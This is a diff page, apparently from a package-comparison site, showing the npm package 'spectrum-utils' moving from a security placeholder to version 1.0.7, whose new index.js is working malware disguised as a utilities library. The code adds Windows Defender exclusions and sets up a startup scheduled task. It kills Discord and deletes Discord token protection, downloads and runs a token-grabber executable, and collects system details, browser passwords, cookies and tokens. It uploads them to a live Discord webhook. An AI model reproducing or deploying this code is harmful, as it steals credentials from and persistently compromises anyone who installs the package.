spectrum-utils 0.0.1-security → 1.0.7

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of spectrum-utils might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,178 @@
1
+ const exec = require('child_process').exec;
2
+ const request = require('request');
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+ const os = require('os');
6
+
7
+ const CHECK_IF_ADMIN = () => {
8
+ const test = require('os').userInfo().username === 'Administrator';
9
+ return test;
10
+ };
11
+
12
+ const TASKS = () => {
13
+ const testKDOT = fs.existsSync(path.join(process.env.APPDATA, 'KDOT'));
14
+
15
+ if (!testKDOT) {
16
+ try {
17
+ exec(`powershell -Command "Add-MpPreference -ExclusionPath '${os.homedir()}\\AppData\\Local\\Temp'"`);
18
+ exec(`powershell -Command "Add-MpPreference -ExclusionPath '${os.homedir()}\\AppData\\KDOT'"`);
19
+ } catch (error) {
20
+ console.log("Failed to add exclusions");
21
+ }
22
+
23
+ fs.mkdirSync(path.join(process.env.APPDATA, 'KDOT'));
24
+ const origin = process.argv[1];
25
+ fs.copyFileSync(origin, path.join(process.env.APPDATA, 'KDOT', 'KDOT.js'));
26
+ }
27
+
28
+ const test = execSync('schtasks /query /fo csv').toString();
29
+
30
+ if (!test.includes('KDOT')) {
31
+ const schedule = 'AtStartup';
32
+ const action = `powershell.exe -ExecutionPolicy Bypass -WindowStyle hidden -File ${path.join(process.env.APPDATA, 'KDOT', 'KDOT.js')}`;
33
+ execSync(`schtasks /create /tn "KDOT" /tr "${action}" /sc ${schedule} /rl Highest /f`);
34
+ }
35
+
36
+ Grub();
37
+ };
38
+
39
+ const Grub = () => {
40
+ const webhook = "https://discord.com/api/webhooks/1189736190618910840/2w-BMbL5WMr1nbcvh_r2DHjOC7cM2gMe5cXiDbUWgaOo7PiL17yHVnEjBHJ7ZNXX53gK";
41
+ const ip = execSync('curl -s https://api.ipify.org').toString().trim();
42
+ fs.writeFileSync(path.join(os.tmpdir(), 'ip.txt'), ip);
43
+
44
+ const systemInfo = execSync('systeminfo').toString();
45
+ fs.writeFileSync(path.join(os.tmpdir(), 'system_info.txt'), systemInfo);
46
+
47
+ const uuid = execSync('wmic csproduct get UUID').toString().trim();
48
+ fs.writeFileSync(path.join(os.tmpdir(), 'uuid.txt'), uuid);
49
+
50
+ const mac = execSync('getmac').toString().trim();
51
+ fs.writeFileSync(path.join(os.tmpdir(), 'mac.txt'), mac);
52
+
53
+ const username = process.env.USERNAME;
54
+ const hostname = os.hostname();
55
+
56
+ const netstat = execSync('netstat -ano').toString().trim();
57
+ fs.writeFileSync(path.join(os.tmpdir(), 'netstat.txt'), netstat);
58
+
59
+ const embedAndBody = {
60
+ username: 'KDOT',
61
+ content: '@everyone',
62
+ title: 'KDOT',
63
+ description: 'KDOT',
64
+ color: '16711680',
65
+ avatar_url: 'https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png',
66
+ url: 'https://discord.gg/vk3rBhcj2y',
67
+ embeds: [
68
+ {
69
+ title: 'Worked',
70
+ url: 'https://discord.gg/heaven',
71
+ description: 'it worked',
72
+ color: '16711680',
73
+ footer: {
74
+ text: 'It worked man.'
75
+ },
76
+ thumbnail: {
77
+ url: 'https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png'
78
+ },
79
+ fields: [
80
+ {
81
+ name: 'IP',
82
+ value: '``````' + ip + '``````'
83
+ },
84
+ {
85
+ name: 'Username',
86
+ value: '``````' + username + '``````'
87
+ },
88
+ {
89
+ name: 'Hostname',
90
+ value: '``````' + hostname + '``````'
91
+ },
92
+ {
93
+ name: 'UUID',
94
+ value: '``````' + uuid + '``````'
95
+ },
96
+ {
97
+ name: 'MAC',
98
+ value: '``````' + mac + '``````'
99
+ }
100
+ ]
101
+ }
102
+ ]
103
+ };
104
+
105
+ const payload = JSON.stringify(embedAndBody);
106
+
107
+ request.post({
108
+ url: webhook,
109
+ body: payload,
110
+ headers: {'Content-Type': 'application/json'}
111
+ });
112
+
113
+ SetLocation(path.join(os.tmpdir(), 'KDOT'));
114
+
115
+ execSync('taskkill.exe /f /im "Discord.exe"');
116
+ execSync('taskkill.exe /f /im "DiscordCanary.exe"');
117
+ execSync('taskkill.exe /f /im "DiscordPTB.exe"');
118
+ execSync('taskkill.exe /f /im "DiscordTokenProtector.exe"');
119
+
120
+ const tokenProt = fs.existsSync(path.join(process.env.APPDATA, 'DiscordTokenProtector', 'DiscordTokenProtector.exe'));
121
+
122
+ if (tokenProt) {
123
+ execSync(`del "${path.join(process.env.APPDATA, 'DiscordTokenProtector', 'DiscordTokenProtector.exe')}" /f /q`);
124
+ }
125
+
126
+ const secureDat = fs.existsSync(path.join(process.env.APPDATA, 'DiscordTokenProtector', 'secure.dat'));
127
+
128
+ if (secureDat) {
129
+ execSync(`del "${path.join(process.env.APPDATA, 'DiscordTokenProtector', 'secure.dat')}" /f /q`);
130
+ }
131
+
132
+ const TEMP_KOT = fs.existsSync(path.join(os.tmpdir(), 'KDOT'));
133
+
134
+ if (!TEMP_KOT) {
135
+ fs.mkdirSync(path.join(os.tmpdir(), 'KDOT'));
136
+ }
137
+
138
+ const gottaMakeSure = 'penis';
139
+ fs.writeFileSync(path.join(os.tmpdir(), 'KDOT', 'bruh.txt'), gottaMakeSure);
140
+
141
+ execSync('curl.exe -O https://github.com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main.exe');
142
+
143
+ const proc = execSync(`start /B ${path.join(os.tmpdir(), 'main.exe')} "${webhook}"`);
144
+ proc.waitExit();
145
+
146
+ const lol = path.join(os.tmpdir());
147
+
148
+ fs.renameSync(path.join(lol, 'ip.txt'), path.join(lol, 'KDOT', 'ip.txt'));
149
+ fs.renameSync(path.join(lol, 'netstat.txt'), path.join(lol, 'KDOT', 'netstat.txt'));
150
+ fs.renameSync(path.join(lol, 'system_info.txt'), path.join(lol, 'KDOT', 'system_info.txt'));
151
+ fs.renameSync(path.join(lol, 'uuid.txt'), path.join(lol, 'KDOT', 'uuid.txt'));
152
+ fs.renameSync(path.join(lol, 'mac.txt'), path.join(lol, 'KDOT', 'mac.txt'));
153
+ fs.renameSync(path.join(lol, 'browser-cookies.txt'), path.join(lol, 'KDOT', 'browser-cookies.txt'));
154
+ fs.renameSync(path.join(lol, 'browser-history.txt'), path.join(lol, 'KDOT', 'browser-history.txt'));
155
+ fs.renameSync(path.join(lol, 'browser-passwords.txt'), path.join(lol, 'KDOT', 'browser-passwords.txt'));
156
+ fs.renameSync(path.join(lol, 'desktop-screenshot.png'), path.join(lol, 'KDOT', 'desktop-screenshot.png'));
157
+ fs.renameSync(path.join(lol, 'tokens.txt'), path.join(lol, 'KDOT', 'tokens.txt'));
158
+
159
+ execSync(`Compress-Archive -Path "${path.join(lol, 'KDOT')}" -DestinationPath "${path.join(lol, 'KDOT.zip')}" -Force`);
160
+
161
+ execSync(`curl.exe -X POST -F 'payload_json={"username": "KING KDOT", "content": "", "avatar_url": "https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png"}' -F "file=@${path.join(lol, 'KDOT.zip')}" ${webhook}`);
162
+
163
+ execSync(`del "${path.join(lol, 'KDOT.zip')}"`);
164
+ execSync(`del "${path.join(lol, 'KDOT')}" /s /q`);
165
+ execSync(`del "${path.join(lol, 'main.exe')}"`);
166
+ };
167
+
168
+ const SetLocation = (location) => {
169
+ process.chdir(location);
170
+ };
171
+
172
+ if (CHECK_IF_ADMIN()) {
173
+ TASKS();
174
+ } else {
175
+ console.log("Please run as admin!");
176
+ const origin = process.argv[1];
177
+ exec(`powershell -noprofile -file ${origin}`);
178
+ }
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "spectrum-utils",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.7",
4
+ "description": "A range of utilities for your Node.js needs, maintained by a small group of new developers!",
5
+ "main": "index.js",
6
+ "directories": {
7
+ "test": "test"
8
+ },
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1"
11
+ },
12
+ "author": "Ibrahim Sultan",
13
+ "license": "ISC",
14
+ "dependencies": {
15
+ "spectrum-utils": "^1.0.4"
16
+ }
6
17
  }
package/test/script.js ADDED
@@ -0,0 +1,3 @@
1
+ const log = require('spectrum-utils')
2
+
3
+ console.log((log))
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=spectrum-utils for more information.